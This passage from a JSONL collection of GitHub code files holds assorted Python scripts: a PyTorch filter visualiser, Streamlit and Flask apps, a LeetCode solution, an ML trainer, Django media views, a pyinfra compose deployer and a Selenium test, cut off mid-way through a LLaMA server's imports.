(#filter_num)\n elif visualize_type == avg, visualize all filters of layer with avg\n\n :filter_index (None, int): determine which filter to visualize\n\n if visualize_type == avg, It is not used.\n\n :nrow('auto', 'input', int): how to determine nrow\n\n if nrow == 'auto', determine nrow by conv_nrow_dict,\n It only works when the {channel, filter_num}is in [16, 32, 64, 128, 256, 512, 1024]\n ({channel, filter_num} is determined by type)\n if not in [16, 32, 64, 128, 256, 512, 1024], change nrow to 'input'\n\n elif nrow == 'input', determine nrow by input\n\n elif nrow is int, directly determine nrow\n\n :show (bool): determine whether to show the results\n\n :save (bool): determine whether to save the results\n\n :save_name (None, str): determines the name to save\n\n if save == False, It is not used.\n\n Returns:\n None\n \"\"\"\n def _normalize(weight):\n weight_max = torch.max(weight)\n weight_min = torch.min(weight)\n temp = (weight + weight_min) / (weight_max + weight_min)\n return temp\n\n def _make_grid(weight, nrow=nrow):\n grid_size = weight.shape[0]\n temp = [weight[i] for i in range(grid_size)]\n change = False\n if nrow == 'auto':\n if grid_size in conv_nrow_dict.keys():\n temp_grid = utils.make_grid(temp, nrow=conv_nrow_dict[grid_size], padding=1)\n else:\n change = True\n\n if nrow == 'input' or change:\n row = int(input(f'num of filters (or channels) is {grid_size}, please enter int for nrow.'))\n temp_grid = utils.make_grid(temp, nrow=row, padding=1)\n\n if isinstance(nrow, int):\n temp_grid = utils.make_grid(temp, nrow=nrow, padding=1)\n\n img = torchvision.transforms.ToPILImage()(temp_grid)\n if save:\n img.save(f'./weight_jpg/{save_name}.png')\n if show:\n img.show()\n\n conv_nrow_dict = {16: 4, 32:4, 64: 8, 128: 8, 256: 16, 512: 16, 1024: 32}\n\n cnt = 0\n for layer in model_layers:\n if isinstance(layer, nn.Conv2d):\n cnt += 1\n if cnt == layer_num:\n p = layer.parameters()\n weight = next(p)\n num_filter = 
weight.shape[0]\n            num_channel = weight.shape[1]\n\n            if visualize_type == 'avg':\n                temp = torch.mean(weight, dim=1)\n                temp = _normalize(temp)\n                temp = temp.unsqueeze(1)\n                _make_grid(temp, nrow)\n\n            elif visualize_type == 'one':\n                temp = weight[filter_index]\n                temp = _normalize(temp)\n                temp = temp.unsqueeze(1)\n                _make_grid(temp, nrow)\n\n","repo_name":"powerpowe/visualize-conv-weight","sub_path":"utils/weight_grid.py","file_name":"weight_grid.py","file_ext":"py","file_size_in_byte":3744,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"8167274414","text":"import os\nimport streamlit as st\nimport pandas as pd\nimport plotly.graph_objects as go\nimport plotly.express as px\n\nfrom datetime import datetime\n\nst.title('BHAVCOPY ANALYZER')\n\npath = r\"P:\\DEPROJECT\\Analyzed_Company_file\"\nli = [os.path.splitext(filename)[0] for filename in os.listdir(path)]\n\nselect_event = st.selectbox('', li)\ndf = pd.read_csv(f\"P:/DEPROJECT/Analyzed_Company_file/{select_event}.csv\")\ndf\n\nfig = go.Figure(data=[go.Candlestick(x=df['DATE'],\n                open=df['OPEN_PRICE'],\n                high=df['HIGH_PRICE'],\n                low=df['LOW_PRICE'],\n                close=df['CLOSE_PRICE'])])\n\nfig\nlst = [\n    'Total traded quantity',\n    'Delivery percentage (in %)',\n    'Delivery vs trading',\n    'Intraday volume',\n    'Number of trades'\n]\n\nop = st.selectbox('', lst)\n\nif op == 'Total traded quantity':\n    fig = go.Figure(\n        data=[go.Bar(y=df['TTL_TRD_QNTY'].iloc[:-1], x=df[\"DATE\"])],\n        layout_title_text=\"\"\n    )\n    fig\nelif op == 'Delivery percentage (in %)':\n    fig = go.Figure(\n        data=[go.Bar(y=df['DELIV_PER'].iloc[:-1], x=df[\"DATE\"])],\n        layout_title_text=\"\"\n    )\n    fig\nelif op == 'Delivery vs trading':\n    fig = go.Figure(\n        data=[go.Bar(name='Delivery', y=df['DELIV_QTY'].iloc[:-1], x=df[\"DATE\"]),\n              go.Bar(name='trading', y=df['TTL_TRD_QNTY'].iloc[:-1], x=df[\"DATE\"])\n              ],\n        layout_title_text=\"\"\n    )\n    fig\nelif op == 'Intraday volume':\n    fig = go.Figure(\n        data=[go.Bar(y=df['Intraday_volume'].iloc[:-1], x=df[\"DATE\"])],\n        layout_title_text=\"\"\n    )\n    fig\nelif op == 'Number of trades':\n    fig = go.Figure(\n        data=[go.Bar(y=df['NO_OF_TRADES'].iloc[:-1], x=df[\"DATE\"])],\n        layout_title_text=\"\"\n    )\n    fig\n","repo_name":"dharmitpatel81/nse-bhavcopy-analyzer","sub_path":"streamlit.py","file_name":"streamlit.py","file_ext":"py","file_size_in_byte":1834,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"74502820967","text":"# https://leetcode.com/problems/convert-bst-to-greater-tree/submissions/\n# Definition for a binary tree node.\nclass TreeNode:\n    def __init__(self, val=0, left=None, right=None):\n        self.val = val\n        self.left = left\n        self.right = right\nclass Solution:\n    def convertBST(self, root: TreeNode) -> TreeNode:\n        self.sum = 0\n        def inverted_inorder(node):\n            # node.right --> node --> node.left\n            if node:\n                inverted_inorder(node.right)\n                self.sum += node.val\n                node.val = self.sum\n                inverted_inorder(node.left)\n        \n        inverted_inorder(root)\n        return root","repo_name":"linminhtoo/algorithms","sub_path":"BinarySearchTree/medium/convertBST.py","file_name":"convertBST.py","file_ext":"py","file_size_in_byte":672,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"10144725645","text":"import ijson\nfrom bs4 import BeautifulSoup\nimport re\nimport tensorflow_hub as hub\nimport faiss\nimport pickle\nimport numpy as np\nimport sys\ndef analyze_posts():\n    classDocStrings={}\n    
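# Hedged note (added): classDocStrings is effectively used as a set of class\n    # names seen in the docstring corpus; the stored value 1 is only a placeholder.\n    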
sampleClassDocStrings=[]\n    sampleStackOverFlow=[]\n    with open('../../data/codeGraph/merge-15-22.2.format.json','rb') as data:\n        docStringObjects = ijson.items(data, 'item')\n        parsedLines = 0\n        for docString in docStringObjects:\n            parsedLines += 1\n            if parsedLines % 10000 == 0:\n                if 'class_docstring' in docString:\n                    if docString['class_docstring'] is not None:\n                        className = docString['klass']\n                        classDocStrings[className] = 1\n                        sampleClassDocStrings.append(className)\n\n            if 'class_docstring' in docString:\n                if docString['class_docstring'] is not None:\n                    className = docString['klass']\n                    classDocStrings[className] = 1\n            else:\n                pass\n    with open('../../data/codeGraph/stackoverflow_questions_per_class_func_1M.json', 'r') as data:\n        docStringObjects = ijson.items(data, 'results.bindings.item')\n        countClassNotinDocstring=0\n        countClassInStackOverflow=0\n\n        with open('../../data/codeGraph/StackOverFlowDocstringSimilarityAnalysis.txt', 'w') as outputFile:\n            print(\"comparing with stackoverflow posts\")\n            sys.stdout=outputFile\n            for docString in docStringObjects:\n                parsedLines += 1\n                classType = docString['type']['value'].replace('http://purl.org/twc/graph4code/ontology/', '')\n                if classType != 'Class':\n                    continue\n                classLabel = docString['class_func_label']['value'].lower() # this might not be needed\n                if classLabel not in classDocStrings:\n                    countClassNotinDocstring+=1\n                    countClassInStackOverflow+=1\n                else:\n                    countClassInStackOverflow+=1\n                if parsedLines % 5000 == 0:\n                    sampleStackOverFlow.append(classLabel)\n\n            print(\"number of classes not in docstring:\", countClassNotinDocstring)\n            print(\"number of classes in Stackoverflow:\", countClassInStackOverflow)\n            print(\"number of unique docstrings\",len(classDocStrings))\n            print(\"Class doc strings\",sampleClassDocStrings)\n            print(\"Class stackoverflow strings\",sampleStackOverFlow)\n\n\nif __name__ == '__main__':\n    analyze_posts()\n","repo_name":"tetherless-world/CodeGraph","sub_path":"embeddingsTest/docstringsStackoverflowAnalysis.py","file_name":"docstringsStackoverflowAnalysis.py","file_ext":"py","file_size_in_byte":3332,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
{"seq_id":"3222675189","text":"\"\"\"\nWorkload Generator (Simulator) for Benchmarking System.\nGenerating the requests (arrival time) according to a fixed time duration and rate\nby a Poisson distribution.\n@author huangyz0918 (Yizheng Huang) and huaizhengzhang (Huaizheng Zhang)\nReference:\n    - https://stackoverflow.com/questions/8592048/is-random-expovariate-equivalent-to-a-poisson-process\n    - https://stackoverflow.com/questions/1155539/how-do-i-generate-a-poisson-process\n    - https://github.com/marcoszh/MArk-Project/blob/master/experiments/request_sender.py\n    - http://web.stanford.edu/class/archive/cs/cs109/cs109.1192/lectureNotes/8%20-%20Poisson.pdf\n    - http://web.mit.edu/modiano/www/6.263/lec5-6.pdf\n\"\"\"\nimport random\n\n\nclass WorkloadGenerator:\n    \"\"\"\n    Class of the requests generator.\n    \"\"\"\n\n    @staticmethod\n    def gen_arrival_time(duration=60 * 1, arrival_rate=5, seed=None):\n        \"\"\"\n        Generating the arrival time according to the Poisson distribution.\n        :param duration: the requests sending duration (in seconds).\n        :param arrival_rate: the average number of requests per second.\n        :param seed: the random seed to reproduce the generated results.\n        :return: a list of times at which to send requests.\n        \"\"\"\n        start_time = 0\n        arrive_time = []\n\n        if seed is not None:\n            random.seed(seed)\n\n        while start_time < duration:\n            start_time = 
start_time + random.expovariate(arrival_rate)\n            arrive_time.append(start_time)\n\n        return arrive_time","repo_name":"MLSysOps/MIGProfiler","sub_path":"migperf/profiler/inference/client/generator.py","file_name":"generator.py","file_ext":"py","file_size_in_byte":1516,"program_lang":"python","lang":"en","doc_type":"code","stars":37,"dataset":"github-code","pt":"53"}
{"seq_id":"36081374818","text":"#!/usr/bin/env python3\n\n# Run this script to (re-)train the model\n# IMPORTANT: leave the percentage value at 1 in jsonreader.py so that all the data is saved\n# Only change that value to test the model (example: 0.8 for an 80-20 split)\n\nfrom open_json import *\nfrom jsonreader import *\nfrom make_dico import *\nfrom sklearn import tree\nimport pickle\nimport os\n\ndata_root = 'data'\n\nif os.path.isdir(data_root):\n    try:\n        features = pickle.load(open('model/features.sav', 'rb'))\n        targets = pickle.load(open('model/targets.sav', 'rb'))\n        class_dict = pickle.load(open('model/class_dict.sav', 'rb'))\n    except Exception:\n        features = []\n        targets = []\n        class_dict = dict()\n    # initialize the global data lists\n\n    eval_features = []\n    eval_targets = []\n    eval_info = []\n\n    # Load the list of new reference files (data directory)\n    json_files = json_path(data_root)\n\n    # Iterate over the files\n    for file in json_files:\n\n        # Build the data lists\n        tmp_features, tmp_targets, tmp_info = make_data(file)\n        tmp_eval_features, tmp_eval_targets, tmp_eval_info = make_test_data(file)\n\n        # Build the classification dictionary\n        tmp_class_dict = make_dico_target_last(file)\n\n        # Update the global data lists\n        features.extend(tmp_features)\n        targets.extend(tmp_targets)\n        eval_features.extend(tmp_eval_features)\n        eval_targets.extend(tmp_eval_targets)\n        class_dict.update(tmp_class_dict)\n\n    # Normalize the lists (so that all rows have the same length)\n    features, eval_features = uniformise_features(features, eval_features)\n\n    # Build the decision tree\n    model = tree.DecisionTreeClassifier()\n    model = model.fit(features, targets)\n\n    nb_error = 0\n\n    # Evaluate the test data\n    for i in range(len(eval_features)):\n        answer = model.predict([eval_features[i]])[0]\n        check = eval_targets[i]\n        if answer != check:\n            print(\"I think this product's category is... \" + class_dict[answer])\n            print(\"The product is actually in category... 
\" + class_dict[check])\n nb_error = nb_error + 1\n\n # Pourcentage de précision de la machine\n if len(eval_features) > 0:\n raw_precision = ((len(eval_features) - nb_error) / len(eval_features))*100\n precision = format(raw_precision, '.2f')\n print(\"Le pourcentage de précision est de \\033[92m\" + str(precision) + \"%.\\033[0m\")\n print(\"Nombre d'erreurs : \" + str(nb_error) + \".\\n\")\n\n # Sauvegarde du modèle\n # AP check or create the directory and move processed files\n # into a new folder\n else:\n if not os.path.exists('model'):\n os.makedirs('model')\n pickle.dump(features, open('model/features.sav', 'wb'))\n pickle.dump(targets, open('model/targets.sav', 'wb'))\n pickle.dump(class_dict, open('model/class_dict.sav', 'wb'))\n print(\"Modèle sauvegardé.\")\n if not os.path.exists('learned'):\n os.makedirs('learned')\n pass\n for file in json_files:\n filename = os.path.basename(file)\n os.rename(file, \"learned/\" + filename)\n\nelse:\n print(\"No data directory found.\")\n","repo_name":"kenygia/VP_ProductDetectDefector","sub_path":"learning.py","file_name":"learning.py","file_ext":"py","file_size_in_byte":3390,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9913130095","text":"from django.conf.urls import patterns, url\nfrom project import views\n\nurlpatterns = patterns('',\n url(r'^$', views.index, name='index'),\n\t\turl(r'^twoperson/', views.twoperson, name= 'twoperson'),\n\t\turl(r'^threeperson/', views.threeperson, name= 'threeperson'),\n\t\turl(r'^movingknife/', views.movingknife, name= 'movingknife'),\n\t\turl(r'^fourperson/', views.fourperson, name= 'fourperson'),\n\t\turl(r'^about/', views.about, name= 'about')\n\t\t)","repo_name":"2092971R/cakecutting","sub_path":"project/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":444,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"37000701152","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\nimport os\nimport sys\nthis = os.getcwd()\npath = this[:this.rfind(\"/\")]\nif not path in sys.path: sys.path.append(path)\nxgboost_path = path + \"/xgboost_regressor\"\npromedios_path = path + \"/promedio_zona\"\n\nimport pandas as pd\nimport matplotlib\nfrom datos import FEATURES_DISPONIBLES\nfrom modelo import Modelo\n\npd.set_option('display.max_columns', 100)\npd.set_option('display.float_format', lambda x: '%.3f' % x)\n\n\n# In[2]:\n\n\nfrom xgboost_regressor.xgboost_predictor import XGBoostRegressor\nfrom promedio_zona.promedio_zona import PromedioZona\nfrom regresion_lineal.regresion_lineal import RegresionLineal\nfrom mlp_regressor.mlp_regressor import MLP_Regressor\n\n\n# In[3]:\n\n\nclass EnsambleConcatenados(XGBoostRegressor):\n \"\"\"\n Usa el resultado de las predicciones del modelo PromedioZona\n para entrenar y predecir con un XGBoostRegressor.\n \"\"\"\n \n \n @Modelo.cronometrar()\n def __init__(self):\n self.modelo_promedios = PromedioZona()\n self.modelo_lineal = RegresionLineal()\n self.modelo_mlp = MLP_Regressor()\n super().__init__() \n \n @Modelo.cronometrar()\n def cargar_datos(self):\n self.modelo_promedios.cargar_datos()\n self.modelo_lineal.cargar_datos()\n self.modelo_mlp.cargar_datos()\n super().cargar_datos()\n \n @Modelo.cronometrar()\n def entrenar(self):\n self.agregar_predicciones_modelo(self.modelo_lineal)\n self.agregar_predicciones_modelo(self.modelo_promedios)\n self.agregar_predicciones_modelo(self.modelo_mlp)\n super().entrenar()\n \n def 
agregar_predicciones_modelo(self, modelo):\n        columna = 'prediccion_' + modelo.modelo\n        modelo.entrenar()\n        score = modelo.validar()\n        print(\"Score individual {}: {}\".format(modelo.modelo, score))\n        predicciones_train = modelo.predecir(modelo.train_data)\n        predicciones_test = modelo.predecir(modelo.test_data)\n        predicciones_submit = modelo.predecir(modelo.submit_data)\n        self.train_data[columna] = predicciones_train['target']\n        self.test_data[columna] = predicciones_test['target']\n        self.submit_data[columna] = predicciones_submit['target']\n\n\n# In[4]:\n\n\nensamble = EnsambleConcatenados()\n\n\n# In[5]:\n\n\nensamble.cargar_datos()\n\n\n# In[6]:\n\n\nensamble.entrenar()\n\n\n# In[7]:\n\n\nensamble.validar()\n\n\n# In[8]:\n\n\npredicciones = ensamble.predecir(ensamble.submit_data)\n\n\n# In[10]:\n\n\ncomentario = \"con regresion lineal mejorada- local 533776 - entrena en 6k segundos\"\nensamble.presentar(predicciones, comentario)\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\npredicciones = ensamble.predecir(ensamble.test_data)\n\n\n# In[ ]:\n\n\ncolumnas_predictoras = ['target', 'prediccion_PromedioZona', 'prediccion_RegresionLineal']\nfor columna in columnas_predictoras:\n    predicciones['diferencia_'+columna] = predicciones['precio'] - predicciones[columna]\n\n\n# In[ ]:\n\n\nmejores_100 = predicciones.sort_values(by='diferencia_target').head(200)\n\n\n# In[ ]:\n\n\npeores_100 = predicciones.sort_values(by='diferencia_target').tail(200)\n\n\n# In[ ]:\n\n\npeores_100.describe()\n\n\n# In[ ]:\n\n\nmejores_100.describe()\n\n","repo_name":"unmateo/7506-TP","sub_path":"src/tp2/modelos/ensamble_concatenados/ensamble.py","file_name":"ensamble.py","file_ext":"py","file_size_in_byte":3154,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"42112239211","text":"# coding: utf-8\nimport sys, os\nsys.path.append(os.pardir) # so that files in the parent directory can be imported\nimport numpy as np\nimport common.optimizer as op\nimport matplotlib.pyplot as plt\n\n\nclass Trainer: # trains the neural network\n    def __init__(self, network, x_train, t_train, x_test, t_test, epochs, batch_size, eval_size, optimizer, param={'lr':0.001}):\n        self.network = network\n        self.x_train = x_train\n        self.t_train = t_train\n        self.x_test = x_test\n        self.t_test = t_test\n        self.epochs = epochs\n        self.batch_size = batch_size\n        self.train_size = x_train.shape[0]\n        self.test_size = x_test.shape[0]\n        self.eval_size = eval_size\n        self.iter_per_epoch = max(self.train_size // batch_size, 1)\n        self.train_loss_list = []\n        self.train_acc_list = []\n        self.test_loss_list = []\n        self.test_acc_list = []\n        optimizer_class_dict = {'sgd':op.SGD, 'momentum':op.Momentum, 'nesterov':op.Nesterov, 'adagrad':op.AdaGrad, 'rmsprop':op.RMSprop, 'adam':op.Adam}\n        self.optimizer = optimizer_class_dict[optimizer.lower()](**param)\n\n\n    def train(self):\n        train_seq = np.arange(self.train_size)\n        \n        for i in range(self.epochs): # number of passes over the whole training set\n            print(\"\\n================== epoch \" + str(i+1) + \" ==================\")\n            \n            train_loss_avg = 0.0\n            np.random.shuffle(train_seq)\n            for j in range(self.iter_per_epoch): # how many chunks (= batch_size) the data is split into per epoch\n                x_batch = self.x_train[train_seq[self.batch_size*j:self.batch_size*(j+1)]]\n                t_batch = self.t_train[train_seq[self.batch_size*j:self.batch_size*(j+1)]]\n                \n                grads = self.network.gradient(x_batch, t_batch)\n                self.optimizer.update(self.network.params, grads)\n                \n                train_loss = self.network.loss(x_batch, t_batch)\n                train_loss_avg += train_loss\n                \n                print(str(j+1) + \": train_loss=\" + 
str(train_loss))\n \n train_loss_avg /= self.iter_per_epoch\n self.train_loss_list.append(train_loss_avg)\n train_acc = self.network.accuracy(self.x_train, self.t_train, self.batch_size)\n self.train_acc_list.append(train_acc)\n \n test_sample_idx = np.random.choice(self.test_size, self.eval_size)\n x_test_sample = self.x_test[test_sample_idx]\n t_test_sample = self.t_test[test_sample_idx]\n \n test_loss = self.network.loss(x_test_sample, t_test_sample)\n self.test_loss_list.append(test_loss)\n test_acc = self.network.accuracy(x_test_sample, t_test_sample, self.eval_size)\n self.test_acc_list.append(test_acc)\n \n print(\"\\nevaluation \" + str(i+1) + \": train_loss=\" + str(train_loss_avg) + \", test_loss=\" + str(test_loss) + \", test_acc=\" + str(test_acc))\n\n print(\"\\n================== Final Test Accuracy ==================\")\n test_acc = self.network.accuracy(self.x_test, self.t_test)\n print(\"test_acc:\" + str(test_acc))\n \n plt.xlabel('epochs')\n plt.xticks(np.arange(1, self.epochs + 1))\n plt.plot(np.arange(1, self.epochs + 1), self.train_loss_list, 'b', label='train_loss', linewidth=0.5)\n plt.plot(np.arange(1, self.epochs + 1), self.train_acc_list, 'y', label='train_acc', linewidth=0.5)\n plt.plot(np.arange(1, self.epochs + 1), self.test_loss_list, 'g', label='test_loss', linewidth=0.5)\n plt.plot(np.arange(1, self.epochs + 1), self.test_acc_list, 'r', label='test_acc', linewidth=0.5)\n plt.legend(loc=(0, 1.01), fontsize=8, ncol=4)\n plt.show()\n","repo_name":"LeeMyeongbo/ML_DL","sub_path":"DL_Projects/common/trainer.py","file_name":"trainer.py","file_ext":"py","file_size_in_byte":3864,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"33826355957","text":"from io import StringIO\nfrom pathlib import PosixPath\nfrom typing import Optional\nfrom pyinfra import inventory, host\nfrom pyinfra.api import operation\nfrom pyinfra.operations import files\nfrom libdeploys import docker_compose\nfrom util.compose import ComposeService, create_compose_file\n\nCONFIG_DIR = PosixPath(\"/etc/compose-apps\")\nDATA_DIR = PosixPath(\"/srv/compose-apps\")\n\n\n@operation\ndef create_app_dirs(name: str):\n config_dir = CONFIG_DIR / name\n data_dir = DATA_DIR / name\n yield from files.directory(config_dir, mode=755, _sudo=True)\n yield from files.directory(data_dir, mode=755, _sudo=True)\n return config_dir, data_dir\n\n\n@operation\ndef create_compose_app(\n name: str,\n services: list[ComposeService],\n networks: Optional[list[str]] = None,\n only_in_group: Optional[str] = None,\n):\n if networks is None:\n networks = []\n\n if only_in_group is not None:\n app_hosts = inventory.get_group(only_in_group)\n if host not in app_hosts:\n print(\n f\"Skipping {name} deploy on {host.name} because it is not in group {only_in_group}\"\n )\n return\n\n config_dir, data_dir = yield from create_app_dirs(name)\n\n compose_file_content = create_compose_file(\n services, networks, volume_base_dir=data_dir\n )\n compose_file_path = config_dir / \"docker-compose.yml\"\n yield from files.put(\n StringIO(compose_file_content),\n str(compose_file_path),\n _sudo=True,\n )\n\n yield from docker_compose.up(compose_file_path, _sudo=True)\n","repo_name":"ubipo/servers","sub_path":"libdeploys/compose_app/operations.py","file_name":"operations.py","file_ext":"py","file_size_in_byte":1559,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"70406216489","text":"\nfrom flask import Flask, jsonify, 
make_response, request\nfrom utils import create_chain\n\n\napp = Flask(__name__)\n\n@app.route(\"/\", methods = ['POST'])\ndef chat():\n if not request.is_json:\n return make_response(\n jsonify(\n {\"success\": False,\n \"error\": \"Unexpected error, request is not in JSON format\"}),\n 400)\n \n try:\n data = request.json\n message = data[\"message\"]\n chatgpt_chain = create_chain()\n prediction = chatgpt_chain.predict(human_input=message)\n \n return jsonify({\"success\": True, \"data\": prediction})\n except:\n return make_response(\n jsonify(\n {\"success\": False, \n \"error\": \"Unexpected error: failed to send the message\"}),\n 400)","repo_name":"homanp/gcp-langchain","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":813,"program_lang":"python","lang":"en","doc_type":"code","stars":61,"dataset":"github-code","pt":"53"} +{"seq_id":"32279638236","text":"from flask import Flask, render_template, request\nimport os\nimport csv\nimport random\n\napp = Flask(__name__)\napp.secret_key = b'CHANGEME!!!!!!!!!!!!'\n\n\n@app.route('/')\ndef index():\n topic_choices = []\n dirs = os.listdir('./csv_files')\n for _dir in dirs:\n if os.path.isdir(f'./csv_files/{_dir}'):\n topic_choices.append(_dir)\n return render_template('index.html', topic_choices=topic_choices)\n\n\n@app.route('/topic')\ndef topic():\n topic_choice = request.args.get('topic')\n quiz_choices = []\n if topic_choice is not None:\n dirs = os.listdir(f'./csv_files/{topic_choice}')\n quiz_choices = dirs\n return render_template('topic.html', quiz_choices=quiz_choices, topic_choice=topic_choice)\n\n\n@app.route('/quiz')\ndef quiz():\n quiz_choice = request.args.get('quiz')\n topic_choice = request.args.get('topic')\n rows = []\n if request.args.get('rows') is None:\n if quiz_choice is not None:\n with open(f'./csv_files/{topic_choice}/{quiz_choice}') as f:\n csvreader = csv.reader(f)\n for row in csvreader:\n rows.append(row)\n else:\n rows = request.args.get('rows')\n random_row = random.choice(rows)\n random.shuffle(rows)\n return render_template('quiz.html', topic_choice=topic_choice, quiz_choice=quiz_choice, rows=rows, random_row=random_row)\n\n\nif __name__ == \"__main__\":\n app.debug = True\n app.run(host='0.0.0.0', port=50003, threaded=True)\n","repo_name":"zandersland/quiz_flask_server","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1482,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20556160939","text":"# oppia/av/views.py\nimport os\n\nfrom django.http import HttpResponse\nfrom django.shortcuts import redirect, get_object_or_404\nfrom django.urls import reverse\nfrom django.utils.translation import gettext_lazy as _\nfrom django.views.generic import ListView\n\nfrom av import handler\nfrom av.models import UploadedMedia\nfrom helpers.mixins.AjaxTemplateResponseMixin import AjaxTemplateResponseMixin\nfrom helpers.mixins.ListItemUrlMixin import ListItemUrlMixin\nfrom oppia.models import Media, Course\nfrom oppia.permissions import permission_view_course\n\nSTR_UPLOAD_MEDIA = _(u'Upload Media')\n\n\nclass AVHome(ListView, AjaxTemplateResponseMixin):\n\n template_name = 'av/home.html'\n ajax_template_name = 'av/query.html'\n queryset = UploadedMedia.objects.all().order_by('-created_date')\n extra_context = {'title': STR_UPLOAD_MEDIA}\n paginate_by = 25\n\n\nclass CourseMediaList(ListView, ListItemUrlMixin, AjaxTemplateResponseMixin):\n\n template_name = 'course/media/list.html'\n ajax_template_name = 
'course/media/query.html'\n paginate_by = 10\n\n def get_queryset(self):\n course_id = self.kwargs['course_id']\n media = Media.objects.filter(course__id=course_id).order_by('id')\n for m in media:\n m.uploaded = UploadedMedia.objects.filter(md5=m.digest).first()\n return media\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context['course'] = Course.objects.get(pk=self.kwargs['course_id'])\n context['uploaded'] = 0\n for media in context['paginator'].object_list:\n context['uploaded'] += 1 if media.uploaded else 0\n\n if self.request.GET.get('error', None) == 'no_media':\n context['no_media'] = True\n return context\n\n\ndef download_media_file(request, media_id):\n media = get_object_or_404(Media, pk=media_id)\n uploaded = get_object_or_404(UploadedMedia, md5=media.digest)\n filepath = uploaded.file.path\n with open(filepath, 'rb') as media_file:\n response = HttpResponse(media_file)\n response['Content-Disposition'] = 'attachment; filename=\"%s\"' % (media.filename)\n response['Content-Length'] = os.path.getsize(filepath)\n return response\n\n\n@permission_view_course\ndef download_course_media(request, course_id):\n course = get_object_or_404(Course, pk=course_id)\n media = Media.objects.filter(course=course)\n uploaded = UploadedMedia.objects.filter(\n md5__in=media.values_list('digest', flat=True))\n for file in uploaded:\n file.media = media.get(digest=file.md5)\n\n filename = course.shortname + \"_media.zip\"\n path = handler.zip_course_media(filename, uploaded)\n\n if path:\n with open(path, 'rb') as package:\n response = HttpResponse(package.read(), content_type='application/zip')\n response['Content-Length'] = os.path.getsize(path)\n response['Content-Disposition'] = 'attachment; filename=\"%s\"' % (filename)\n return response\n else:\n return redirect(reverse('av:course_media', kwargs={'course_id': course.pk})+'?error=no_media')\n","repo_name":"DigitalCampus/django-oppia","sub_path":"av/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3111,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"53"} +{"seq_id":"36520538906","text":"# Pythonic --> Below two concepts are crucial in understanding Python's ways of programming.\n# DUCK TYPING --> You assume that if an object walks like a duck and quacks like a duck. It is a duck.\n# EAFP --> Easier to Ask Forgiveness than Permission.\n\nclass DuckT:\n\n def quack(self):\n print('Quack, quack')\n\n def fly(self):\n print('flap, flap!')\n\n\nclass Person:\n\n def quack(self):\n print('I am quacking like a duck')\n\n def fly(self):\n print('I am flapping my Arms!')\n\n# The below method is not Pythonic at all.\ndef quack_and_fly(thing):\n #THE following is not Pythonic.\n if hasattr(thing, 'quack'):\n if callable(thing.quack):\n thing.quack()\n \n if hasattr(thing, 'fly'):\n if callable(thing.fly):\n thing.fly()\n # The following example is not duck typed and hence non pythonic.\n #if isinstance(thing, DuckT): #\n thing.quack()\n thing.fly()\n #else:\n # print('This has to be a duck!')\n\n print()\n\ndef quack_and_fly_pythonic(thing):\n #Example of DUCK TYPING:\n # thing.quack()\n # thing.fly()\n \n # This is Pythonic as well.\n try:\n thing.quack()\n thing.fly()\n thing.bark()\n except AttributeError as e:\n print(e)\n\n print()\n\n\n\nd = DuckT()\nquack_and_fly_pythonic(d)\n\np = Person() # In duck typing if person behaves like a duck (i.e. 
has quack and fly methods) it is a DUCK!!\nquack_and_fly(p)\n\n\n\n","repo_name":"ameerhkhan/Python-Practice-Exercises","sub_path":"ductyping/ducktyping_explain.py","file_name":"ducktyping_explain.py","file_ext":"py","file_size_in_byte":1445,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"1406591515","text":"import unittest\nfrom selenium import webdriver\n\nclass BaiduTest(unittest.TestCase):\n\n @classmethod\n def setUpClass(cls):\n print('类级别的准备工作')\n cls.driver = webdriver.Chrome()\n\n\n def test_baidu_title(self):\n url = 'https://www.baidu.com/'\n BaiduTest.driver.get(url)\n print('验证百度首页的标题')\n title = self.__class__.driver.title\n self.assertEqual(title,'百度一下,你就知道')\n\n @unittest.skip('暂时跳过')\n def test_baidu_zhidao_title(self):\n url = 'https://zhidao.baidu.com/'\n self.__class__.driver.get(url)\n print('验证百度知道的标题')\n title = self.__class__.driver.title\n self.assertTrue('全球领先' in title)\n\n @classmethod\n def tearDownClass(cls):\n print('类级别的清理工作')\n cls.driver.quit()\n\nif __name__ == '__main__':\n unittest.main(verbosity=1)","repo_name":"guozizheng1/VIP_Selenium","sub_path":"SEC08/test_case_02.py","file_name":"test_case_02.py","file_ext":"py","file_size_in_byte":933,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"1010026337","text":"import itertools\nimport json\nimport logging\nimport os\nfrom multiprocessing import Process, Queue\nfrom pathlib import Path\nfrom queue import Empty\nfrom time import sleep, time\nfrom typing import Any, Dict, List, NamedTuple, Optional, Tuple\nfrom uuid import uuid4\n\nimport sentry_sdk\nfrom sentry_sdk.integrations.flask import FlaskIntegration\nimport torch\nfrom flask import Flask, jsonify, make_response, Response, request\nfrom waitress import serve\nfrom fairscale.nn.model_parallel.initialize import initialize_model_parallel, get_model_parallel_group\nfrom llama import ModelArgs, Transformer, Tokenizer, 